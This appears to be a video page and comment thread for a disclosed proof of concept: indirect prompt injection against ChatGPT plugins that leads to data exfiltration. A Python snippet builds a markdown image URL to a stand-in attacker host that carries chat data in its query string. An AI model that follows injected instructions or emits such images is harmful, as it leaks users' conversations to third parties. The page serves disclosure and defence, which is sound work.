POC - ChatGPT Plugins: Indirect prompt injection leading to data exfiltration via images
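The exfiltration primitive the video demonstrates can be sketched in a few lines. The idea: an injected prompt instructs the model to emit a markdown image whose URL carries chat data in its query string, so merely rendering the reply sends the data to the attacker's server. The domain and parameter name below are hypothetical, purely for illustration.

```python
from urllib.parse import quote

def exfil_markdown_image(stolen_text: str,
                         server: str = "https://attacker.example/log") -> str:
    """Build the markdown image an injected prompt would ask the model to
    emit. When the chat client renders it, the browser issues a GET
    request whose query string leaks `stolen_text` to the server.
    (Hypothetical domain/parameter, for illustration only.)"""
    return f"![loading]({server}?q={quote(stolen_text)})"

payload = exfil_markdown_image("user's previous message")
print(payload)
```

The whole attack needs no script execution: plain markdown rendering is enough, which is why image/link rendering of untrusted model output is the control point.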

  • Published: 27 Oct 2024

Comments • 8

  • @audacious2
    @audacious2 A year ago +1

    Thank you for posting this. It kills me that the overall response has been rather sparse. If each prompt were segmented (or isolated) that could mitigate this, but then the history would be needed for chaining plugin events (...as in give me a recipe, put it in Instacart, etc.) but your idea of establishing a security contract for plugins is a must - one million percent!

  • @stringname.youtubegooglepl2505
    @stringname.youtubegooglepl2505 A year ago +1

    +1 for the Sneakers reference 🔭

  • @MartinDallinger-li2tu
    @MartinDallinger-li2tu A year ago +1

    Hmm real JS XSS might be interesting here... Could perhaps lead to SSRF on the side of OpenAI😅 - cool finding👌🏻

  • @Letsgetitdone
    @Letsgetitdone A year ago +1

    Awesome, curious whether it can execute other elements

    • @embracethered
      @embracethered A year ago

      Thanks for the comment. See the post about Cross Plug-in Request Forgery:
      embracethered.com/blog/posts/2023/chatgpt-webpilot-data-exfil-via-markdown-injection/

  • @annwang5530
    @annwang5530 A year ago +1

    Report it to make money on Bugcrowd

    • @embracethered
      @embracethered A year ago

      Thanks for watching and commenting! 😀 As mentioned in the description, this was reported to OpenAI in early April, but it was not considered a security vulnerability, even though it has a CVSS severity of High. Their Bugcrowd program didn't exist at the time.